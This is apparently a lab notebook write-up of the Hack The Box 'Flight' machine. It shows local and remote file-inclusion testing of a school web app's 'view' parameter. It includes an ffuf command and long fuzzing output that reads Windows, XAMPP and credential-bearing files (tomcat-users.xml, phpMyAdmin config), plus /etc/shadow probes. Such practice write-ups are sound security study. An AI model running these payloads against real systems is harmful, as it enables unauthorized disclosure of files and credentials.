school.flight.htb

The discovered virtual host / sub-domain appears to be hosting an aviation school within the organization Content is just ipsum

The 3 buttons in the navigation bar appear rather interesting as they fetch and load resources via a parameter; view

given those 3 resources do exist, this seems to suggest the use of the php include function

LFI

LFI appears confirmed as the index.php file is executed twice

RFI

┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ echo '<?php phpinfo(); ?>' > phpinfo.php

Testing for RFI

While the web application did fetch and load the remote resource from the Kali web server, it doesn’t seem to execute it

Blacklist

Additionally, I found that there is a list of blacklisted words. The following blacklisted words have been identified;

..
\
filter

Fuzzing

┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ ffuf -c -w /usr/share/wordlists/auto_wordlists/wordlists/file_inclusion_windows.txt -u http://school.flight.htb/index.php?view=FUZZ -H 'Content-Type: application/x-www-form-urlencoded' -fr 'Suspicious Activity Blocked!' -fs 1102
________________________________________________
 :: Method           : GET
 :: URL              : http://school.flight.htb/index.php?view=FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/Auto_Wordlists/wordlists/file_inclusion_windows.txt
 :: Header           : Content-Type: application/x-www-form-urlencoded
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 1102
 :: Filter           : Regexp: Suspicious Activity Blocked!
________________________________________________
%00/etc/shadow%00       [status: 500, Size: 639, Words: 73, Lines: 21, Duration: 185ms]
%00/etc/passwd%00       [status: 500, Size: 639, Words: 73, Lines: 21, Duration: 255ms]
c:/WINDOWS/System32/drivers/etc/hosts [Status: 200, Size: 1926, Words: 315, Lines: 52, Duration: 90ms]
c:/WINDOWS/win.ini      [Status: 200, Size: 1194, Words: 149, Lines: 38, Duration: 91ms]
c:/Windows/win.ini      [Status: 200, Size: 1194, Words: 149, Lines: 38, Duration: 85ms]
c:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml [Status: 200, Size: 45670, Words: 8921, Lines: 700, Duration: 86ms]
c:/windows/system.ini   [Status: 200, Size: 1321, Words: 148, Lines: 44, Duration: 87ms]
c:/windows/system32/drivers/etc/hosts [Status: 200, Size: 1926, Words: 315, Lines: 52, Duration: 135ms]
c:/windows/windowsupdate.log [Status: 200, Size: 1378, Words: 173, Lines: 35, Duration: 90ms]
c:/windows/win.ini      [Status: 200, Size: 1194, Words: 149, Lines: 38, Duration: 91ms]
c:/xampp/apache/conf/httpd.conf [Status: 200, Size: 22337, Words: 2849, Lines: 597, Duration: 90ms]
c:/xampp/phpmyadmin/config.inc.php [Status: 200, Size: 3153, Words: 274, Lines: 92, Duration: 137ms]
c:/xampp/webdav/webdav.txt [Status: 200, Size: 1379, Words: 167, Lines: 39, Duration: 129ms]
c:/xampp/tomcat/conf/tomcat-users.xml [Status: 200, Size: 3914, Words: 591, Lines: 87, Duration: 132ms]
c:/xampp/sendmail/sendmail.ini [Status: 200, Size: 3198, Words: 431, Lines: 103, Duration: 139ms]
c:/windows/system32/inetsrv/config/schema/aspnet_schema.xml [Status: 200, Size: 45670, Words: 8921, Lines: 700, Duration: 86ms]
c:/windows/system32/license.rtf [Status: 200, Size: 62635, Words: 7856, Lines: 365, Duration: 89ms]
c:/windows/panther/setupinfo [Status: 200, Size: 249166, Words: 8732, Lines: 465, Duration: 88ms]
c:/windows/notepad.exe  [Status: 200, Size: 255566, Words: 1590, Lines: 713, Duration: 93ms]
c:/xampp/php/php.ini    [Status: 200, Size: 75093, Words: 9638, Lines: 2026, Duration: 159ms]
c:/WINDOWS/WindowsUpdate.log [Status: 200, Size: 1378, Words: 173, Lines: 35, Duration: 96ms]
c:/xampp/tomcat/conf/web.xml [Status: 200, Size: 177712, Words: 42818, Lines: 4762, Duration: 133ms]
c:/WINDOWS/system32/drivers/etc/hosts [Status: 200, Size: 1926, Words: 315, Lines: 52, Duration: 93ms]
c:/WINDOWS/system32/drivers/etc/protocol [Status: 200, Size: 2460, Words: 588, Lines: 58, Duration: 89ms]
c:/WINDOWS/system32/drivers/etc/networks [Status: 200, Size: 1509, Words: 231, Lines: 47, Duration: 90ms]
c:/WINDOWS/system32/drivers/etc/lmhosts.sam [Status: 200, Size: 4785, Words: 771, Lines: 110, Duration: 90ms]
c:/WINDOWS/system32/drivers/etc/services [Status: 200, Size: 18737, Words: 8656, Lines: 318, Duration: 87ms]
c:/windows/explorer.exe [Status: 200, Size: 4385078, Words: 28703, Lines: 12751, Duration: 103ms]
c:/xampp/apache/logs/error.log [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 189ms]
c:/xampp/apache/logs/access.log [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 371ms]
c:/programdata/microsoft/appv/setup/officeintegrator.ps1 [Status: 200, Size: 6070, Words: 1415, Lines: 173, Duration: 93ms]
c:/programdata/microsoft/uev/inboxtemplates/easeofaccesssettings2013.xml [Status: 200, Size: 7051, Words: 846, Lines: 164, Duration: 92ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftinternetexplorer2013.xml [Status: 200, Size: 4213, Words: 801, Lines: 129, Duration: 92ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftinternetexplorer2013backup.xml [Status: 200, Size: 3641, Words: 580, Lines: 106, Duration: 90ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftlync2010.xml [Status: 200, Size: 5070, Words: 751, Lines: 140, Duration: 93ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftlync2013win64.xml [Status: 200, Size: 3967, Words: 548, Lines: 105, Duration: 93ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftlync2013win32.xml [Status: 200, Size: 3967, Words: 548, Lines: 105, Duration: 93ms]
c:/programdata/microsoft/identitycrl/int/wlidsvcconfig.xml [Status: 200, Size: 13848, Words: 252, Lines: 35, Duration: 89ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftnotepad.xml [Status: 200, Size: 2059, Words: 255, Lines: 57, Duration: 93ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftoffice2013office365win32.xml [Status: 200, Size: 11698, Words: 2502, Lines: 368, Duration: 91ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftoffice2013backupwin64.xml [Status: 200, Size: 14262, Words: 2985, Lines: 431, Duration: 92ms]
c:/programdata/microsoft/identitycrl/production/wlidsvcconfig.xml [Status: 200, Size: 13805, Words: 252, Lines: 35, Duration: 86ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftoutlook2013cawin64.xml [Status: 200, Size: 2388, Words: 304, Lines: 63, Duration: 89ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftoutlook2013cawin32.xml [Status: 200, Size: 2388, Words: 304, Lines: 63, Duration: 89ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftoffice2013office365win64.xml [Status: 200, Size: 11698, Words: 2502, Lines: 368, Duration: 92ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftoutlook2016cawin64.xml [Status: 200, Size: 2391, Words: 308, Lines: 63, Duration: 91ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftskypeforbusiness2016win64.xml [Status: 200, Size: 3993, Words: 550, Lines: 105, Duration: 91ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftskypeforbusiness2016win32.xml [Status: 200, Size: 3993, Words: 550, Lines: 105, Duration: 91ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftoutlook2016cawin32.xml [Status: 200, Size: 2391, Words: 308, Lines: 63, Duration: 91ms]
c:/programdata/microsoft/uev/inboxtemplates/networkprinters.xml [Status: 200, Size: 3245, Words: 360, Lines: 77, Duration: 93ms]
c:/programdata/microsoft/uev/inboxtemplates/themesettings2013.xml [Status: 200, Size: 3708, Words: 430, Lines: 91, Duration: 93ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftwordpad.xml [Status: 200, Size: 2107, Words: 256, Lines: 57, Duration: 95ms]
c:/programdata/microsoft/uev/inboxtemplates/roamingcredentialsettings.xml [Status: 200, Size: 4519, Words: 536, Lines: 102, Duration: 95ms]
c:/programdata/microsoft/uev/inboxtemplates/vdistate.xml [Status: 200, Size: 1994, Words: 251, Lines: 57, Duration: 99ms]
c:/programdata/microsoft/uev/scripts/registerinboxtemplates.ps1 [Status: 200, Size: 1713, Words: 205, Lines: 43, Duration: 94ms]
c:/programdata/microsoft/uev/inboxtemplates/desktopsettings2013.xml [Status: 200, Size: 19391, Words: 2202, Lines: 422, Duration: 92ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftoffice2013backupwin32.xml [Status: 200, Size: 14262, Words: 2985, Lines: 431, Duration: 92ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftoffice2016backupwin64.xml [Status: 200, Size: 14262, Words: 2985, Lines: 431, Duration: 89ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftoffice2016backupwin32.xml [Status: 200, Size: 14262, Words: 2985, Lines: 431, Duration: 89ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftoffice2010win32.xml [Status: 200, Size: 73887, Words: 15476, Lines: 2027, Duration: 92ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftoffice2013win32.xml [Status: 200, Size: 69469, Words: 14521, Lines: 1895, Duration: 93ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftoffice2010win64.xml [Status: 200, Size: 73887, Words: 15476, Lines: 2027, Duration: 94ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftoffice2013win64.xml [Status: 200, Size: 69469, Words: 14521, Lines: 1895, Duration: 88ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftoffice2016win64.xml [Status: 200, Size: 66836, Words: 13936, Lines: 1819, Duration: 88ms]
c:/programdata/microsoft/uev/inboxtemplates/microsoftoffice2016win32.xml [Status: 200, Size: 66833, Words: 13934, Lines: 1819, Duration: 91ms]
c:/recovery/reagentold.xml [Status: 200, Size: 2142, Words: 221, Lines: 53, Duration: 92ms]
c:/windows/boot/bootdebuggerfiles.ini [Status: 200, Size: 1237, Words: 149, Lines: 38, Duration: 92ms]
c:/windows/diagnostics/index/appsdiagnostic.xml [Status: 200, Size: 2335, Words: 223, Lines: 55, Duration: 88ms]
 
[...REDACTED...]
 
 
c:/windows/speech_onecore/engines/tts/en-us/m1033eva.ini [Status: 200, Size: 2747, Words: 149, Lines: 121, Duration: 94ms]
c:/windows/speech_onecore/engines/tts/en-us/m1033david.ini [Status: 200, Size: 2014, Words: 158, Lines: 88, Duration: 95ms]
c:/windows/speech_onecore/engines/tts/en-us/m1033mark.ini [Status: 200, Size: 2336, Words: 149, Lines: 108, Duration: 92ms]
c:/windows/system.ini   [Status: 200, Size: 1321, Words: 148, Lines: 44, Duration: 89ms]
c:/windows/speech_onecore/engines/tts/en-us/msttslocenus.ini [Status: 200, Size: 2488, Words: 144, Lines: 63, Duration: 90ms]
c:/windows/speech_onecore/engines/tts/en-us/m1033zira.ini [Status: 200, Size: 2461, Words: 147, Lines: 111, Duration: 93ms]
c:/windows/softwaredistribution/reportingevents.log [Status: 200, Size: 108426, Words: 2222, Lines: 208, Duration: 87ms]
c:/windows/system32/appraiser/appraiser_data.ini [Status: 200, Size: 147223, Words: 148, Lines: 5343, Duration: 93ms]
c:/windows/system32/appv/appvstreamingux.exe.config [Status: 200, Size: 1293, Words: 156, Lines: 36, Duration: 96ms]
c:/windows/system32/appxprovisioning.xml [Status: 200, Size: 4124, Words: 361, Lines: 78, Duration: 96ms]
c:/windows/system32/appraiser/appraiser_telemetryrunlist.xml [Status: 200, Size: 113899, Words: 3198, Lines: 1419, Duration: 97ms]
c:/windows/system32/ddfs/certificatestore_ddf.xml [Status: 200, Size: 75693, Words: 45506, Lines: 1673, Duration: 86ms]
c:/windows/system32/ddfs/enterprisemodernappmanagementddf.xml [Status: 200, Size: 30434, Words: 14590, Lines: 1112, Duration: 86ms]
c:/windows/system32/ddfs/ngcproddf_v1.2_final.xml [Status: 200, Size: 53708, Words: 21325, Lines: 1313, Duration: 91ms]
c:/windows/system32/ddfs/win32compatibilityappraiser_ddf.xml [Status: 200, Size: 21317, Words: 8276, Lines: 544, Duration: 97ms]
c:/windows/system32/drivers/etc/hosts [Status: 200, Size: 1926, Words: 315, Lines: 52, Duration: 92ms]
c:/windows/system32/detailedreading-default.xml [Status: 200, Size: 5046, Words: 719, Lines: 189, Duration: 93ms]
c:/windows/microsoft.net/framework/v4.0.30319/aspnet_perf.ini [Status: 200, Size: 998600, Words: 31409, Lines: 8610, Duration: 103ms]
c:/windows/servicing/editions/editionmappings.xml [Status: 200, Size: 2438, Words: 147, Lines: 94, Duration: 715ms]
c:/windows/inf/setupapi.dev.log [Status: 200, Size: 1500631, Words: 350708, Lines: 20164, Duration: 104ms]
c:/windows/servicing/editions/editionmatrix.xml [Status: 200, Size: 6299, Words: 293, Lines: 89, Duration: 588ms]
c:/windows/system32/catroot2/dberr.txt [Status: 200, Size: 197201, Words: 21543, Lines: 2171, Duration: 95ms]
c:/windows/system32/ddfs/dmclient_ddf.xml [Status: 200, Size: 70436, Words: 34579, Lines: 1976, Duration: 90ms]
c:/windows/system32/f12/timeline.cpu.xml [Status: 200, Size: 4109, Words: 386, Lines: 73, Duration: 92ms]
c:/windows/system32/icsxml/cmnicfg.xml [Status: 200, Size: 6970, Words: 1189, Lines: 209, Duration: 92ms]
c:/windows/system32/ime/imejp/applets/imjpclst.xml [Status: 200, Size: 61185, Words: 552, Lines: 2597, Duration: 89ms]
c:/windows/system32/icsxml/potscfg.xml [Status: 200, Size: 3714, Words: 746, Lines: 113, Duration: 94ms]
c:/windows/system32/icsxml/osinfo.xml [Status: 200, Size: 1882, Words: 261, Lines: 77, Duration: 94ms]
c:/windows/system32/icsxml/ipcfg.xml [Status: 200, Size: 14553, Words: 2891, Lines: 404, Duration: 95ms]
c:/windows/system32/icsxml/pppcfg.xml [Status: 200, Size: 15536, Words: 3106, Lines: 435, Duration: 94ms]
c:/windows/softwaredistribution/datastore/logs/edbtmp.log [Status: 200, Size: 1311822, Words: 8953, Lines: 5226, Duration: 87ms]
c:/windows/system32/inetsrv/config/schema/aspnet_schema.xml [Status: 200, Size: 45670, Words: 8921, Lines: 700, Duration: 87ms]
c:/windows/system32/logfiles/setupcln/diagwrn.xml [Status: 200, Size: 31567, Words: 1088, Lines: 1021, Duration: 93ms]
c:/windows/system32/logfiles/setupcln/setupact.log [Status: 200, Size: 124586, Words: 33357, Lines: 1086, Duration: 94ms]
c:/windows/system32/logfiles/setupcln/setuperr.log [Status: 200, Size: 16769, Words: 3840, Lines: 143, Duration: 90ms]
c:/windows/system32/mmc.exe.config [Status: 200, Size: 4205, Words: 651, Lines: 75, Duration: 91ms]
c:/windows/system32/ndfeventview.xml [Status: 200, Size: 1667, Words: 153, Lines: 47, Duration: 86ms]
c:/windows/system32/nettrace.pla.diagnostics.xml [Status: 200, Size: 22758, Words: 3157, Lines: 494, Duration: 86ms]
c:/windows/system32/oemdefaultassociations.xml [Status: 200, Size: 6287, Words: 530, Lines: 85, Duration: 94ms]
c:/windows/system32/scavengespace.xml [Status: 200, Size: 11531, Words: 2349, Lines: 448, Duration: 98ms]
c:/windows/system32/slmgr/0409/slmgr.ini [Status: 200, Size: 48122, Words: 2043, Lines: 351, Duration: 98ms]
c:/windows/system32/recovery/reagent.xml [Status: 200, Size: 2207, Words: 221, Lines: 53, Duration: 97ms]
c:/windows/system32/logfiles/setupcln/diagerr.xml [Status: 200, Size: 66481, Words: 3776, Lines: 1133, Duration: 91ms]
c:/windows/system32/license.rtf [Status: 200, Size: 62635, Words: 7856, Lines: 365, Duration: 94ms]
c:/windows/system32/speech_onecore/common/en-us/tokens_sr_en-us-n.xml [Status: 200, Size: 4370, Words: 596, Lines: 89, Duration: 99ms]
c:/windows/system32/speech_onecore/common/en-us/tokens_voiceactivation_en-us.xml [Status: 200, Size: 2845, Words: 359, Lines: 57, Duration: 97ms]
c:/windows/system32/speech_onecore/common/tokens.xml [Status: 200, Size: 15139, Words: 2727, Lines: 130, Duration: 95ms]
c:/windows/system32/speech_onecore/common/en-us/tokens_tts_en-us.xml [Status: 200, Size: 4362, Words: 516, Lines: 71, Duration: 100ms]
c:/windows/system32/spool/drivers/w32x86/3/unishare-pipelineconfig.xml [Status: 200, Size: 1155, Words: 147, Lines: 33, Duration: 95ms]
c:/windows/system32/speech_onecore/common/en-us/tokens_tts_en-us_david.xml [Status: 200, Size: 2819, Words: 340, Lines: 53, Duration: 102ms]
c:/windows/system32/spool/drivers/x64/3/unishare-pipelineconfig.xml [Status: 200, Size: 1155, Words: 147, Lines: 33, Duration: 96ms]
c:/windows/servicing/editions/upgradematrix.xml [Status: 200, Size: 27662, Words: 1145, Lines: 261, Duration: 607ms]
c:/windows/pla/rules/rules.system.configuration.xml [Status: 200, Size: 288890, Words: 49759, Lines: 3902, Duration: 109ms]
c:/windows/system32/drivers/gmreadme.txt [Status: 200, Size: 1748, Words: 209, Lines: 45, Duration: 95ms]
c:/windows/system32/sysprep/actionfiles/specialize.xml [Status: 200, Size: 21319, Words: 619, Lines: 147, Duration: 94ms]
c:/windows/pla/rules/rules.system.diagnostics.xml [Status: 200, Size: 170127, Words: 33715, Lines: 2607, Duration: 110ms]
c:/windows/system32/sysprep/actionfiles/respecialize.xml [Status: 200, Size: 1518, Words: 153, Lines: 33, Duration: 95ms]
c:/windows/system32/sysprep/actionfiles/cleanup.xml [Status: 200, Size: 13661, Words: 440, Lines: 103, Duration: 96ms]
c:/windows/system32/sysprep/actionfiles/generalize.xml [Status: 200, Size: 32490, Words: 830, Lines: 225, Duration: 97ms]
c:/windows/system32/systemresetplatform/systemresetplugins.xml [Status: 200, Size: 1386, Words: 154, Lines: 36, Duration: 91ms]
c:/windows/system32/tcpbidi.xml [Status: 200, Size: 2775, Words: 557, Lines: 64, Duration: 91ms]
c:/windows/system32/uevappmonitor.exe.config [Status: 200, Size: 1248, Words: 157, Lines: 38, Duration: 100ms]
c:/windows/system32/wbem/xsl-mappings.xml [Status: 200, Size: 3968, Words: 190, Lines: 57, Duration: 95ms]
c:/windows/system32/windowspowershell/v1.0/examples/profile.ps1 [Status: 200, Size: 1563, Words: 217, Lines: 37, Duration: 103ms]
c:/windows/system32/wdsunattendtemplate.xml [Status: 200, Size: 1716, Words: 207, Lines: 42, Duration: 104ms]
c:/windows/system32/wimbootcompress.ini [Status: 200, Size: 3506, Words: 178, Lines: 110, Duration: 102ms]
c:/windows/system32/wpr.config.xml [Status: 200, Size: 1826, Words: 202, Lines: 42, Duration: 93ms]
c:/windows/system32/winrm/0409/winrm.ini [Status: 200, Size: 103616, Words: 3926, Lines: 727, Duration: 94ms]
c:/windows/system32/wsmanconfig_schema.xml [Status: 200, Size: 5777, Words: 1033, Lines: 99, Duration: 101ms]
c:/windows/microsoft.net/framework64/v4.0.30319/ngen.log [Status: 200, Size: 747432, Words: 58672, Lines: 3496, Duration: 97ms]
c:/windows/syswow64/appxprovisioning.xml [Status: 200, Size: 4124, Words: 361, Lines: 78, Duration: 86ms]
c:/windows/win.ini      [Status: 200, Size: 1194, Words: 149, Lines: 38, Duration: 105ms]
c:/windows/windowsupdate.log [Status: 200, Size: 1378, Words: 173, Lines: 35, Duration: 105ms]
c:/xampp/apache/conf/httpd.conf [Status: 200, Size: 22337, Words: 2849, Lines: 597, Duration: 120ms]
c:/windows/syswow64/winrm/0409/winrm.ini [Status: 200, Size: 103616, Words: 3926, Lines: 727, Duration: 91ms]
c:/windows/syswow64/windowspowershell/v1.0/modules/microsoft.powershell.odatautils/microsoft.powershell.odataadapter.ps1 [Status: 200, Size: 172202, Words: 20628, Lines: 2101, Duration: 87ms]
c:/xampp/phpMyAdmin/config.inc.php [Status: 200, Size: 3153, Words: 274, Lines: 92, Duration: 168ms]
c:/xampp/php/php.ini    [Status: 200, Size: 75093, Words: 9638, Lines: 2026, Duration: 171ms]
c:/xampp/phpmyadmin/config.inc.php [Status: 200, Size: 3153, Words: 274, Lines: 92, Duration: 155ms]
c:/xampp/sendmail/sendmail.ini [Status: 200, Size: 3198, Words: 431, Lines: 103, Duration: 148ms]
c:/xampp/tomcat/conf/tomcat-users.xml [Status: 200, Size: 3914, Words: 591, Lines: 87, Duration: 133ms]
c:/xampp/webdav/webdav.txt [Status: 200, Size: 1379, Words: 167, Lines: 39, Duration: 126ms]
c:/xampp/tomcat/conf/web.xml [Status: 200, Size: 177712, Words: 42818, Lines: 4762, Duration: 126ms]
c:/windows/logs/dism/dism.log [Status: 200, Size: 3578351, Words: 641619, Lines: 17620, Duration: 98ms]
c:/windows/panther/setupact.log [Status: 200, Size: 4075332, Words: 715882, Lines: 22983, Duration: 109ms]
c:/windows/softwaredistribution/datastore/logs/edb.log [Status: 200, Size: 1311822, Words: 2907, Lines: 2071, Duration: 121ms]
c:/windows/security/database/edbtmp.log [Status: 200, Size: 1049678, Words: 1180, Lines: 678, Duration: 398ms]
c:/windows/servicing/sessions/sessions.back.xml [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 119ms]
c:/windows/servicing/sessions/sessions.xml [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 127ms]
c:/xampp/apache/logs/access.log [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 378ms]
c:/xampp/apache/logs/error.log [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 203ms]
:: Progress: [5489/5489] :: Job [1/1] :: 19 req/sec :: Duration: [0:00:33] :: Errors: 0 ::

Fuzzing for LFI reveals a lot of files within the target system. The list was so long that the majority was redacted from here, i can learn that the web applications are hosted from apache’s xampp as suggested by the presence of the c:/xampp directory

While the configuration files for XAMPP are dispersed across under the /xampp directory, it’s heavily dependent on use cases I went through several files and nothing note-worthy was found

Apache log

Checking the Apache log, I can learn that the web applications are hosted from the C:\xampp\htdocs directory

PHP get_file_contents

As I was unable to progress forward, I decided to look back at the LFI. Checking the source code reveals something ciritical

I initially thought that LFI was confirmed as the index.php file appears to have loaded twice, but that wasn’t the case. Checking the source code of the LFI reveals the source code of the index.php file, which is not supposed to happen as it would have been just executed.

it reveals that it’s not actually the thought-to-be-confirmed-lfi that loaded and executed the index.php file twice, but rather due to the conditional statement that loads the home page at c:\\xampp\htdocs\school.flight.htb\\home.html there is no php include. Instead, the view parameter of the index.php file is using the PHP get_file_contents to fetch(“include”) and load resources. This explains why PHP codes are not being executed because they were being read as strings

This concludes that PHP code execution is impossible However, I haven’t tried the inclusion over SMB

InfoSec LAB

Explorer

Flight_Web_school.flight.htb

school.flight.htb

LFI

RFI

Blacklist

Fuzzing

Apache log

PHP get_file_contents

Interactive Graph View

Table of Contents

Backlinks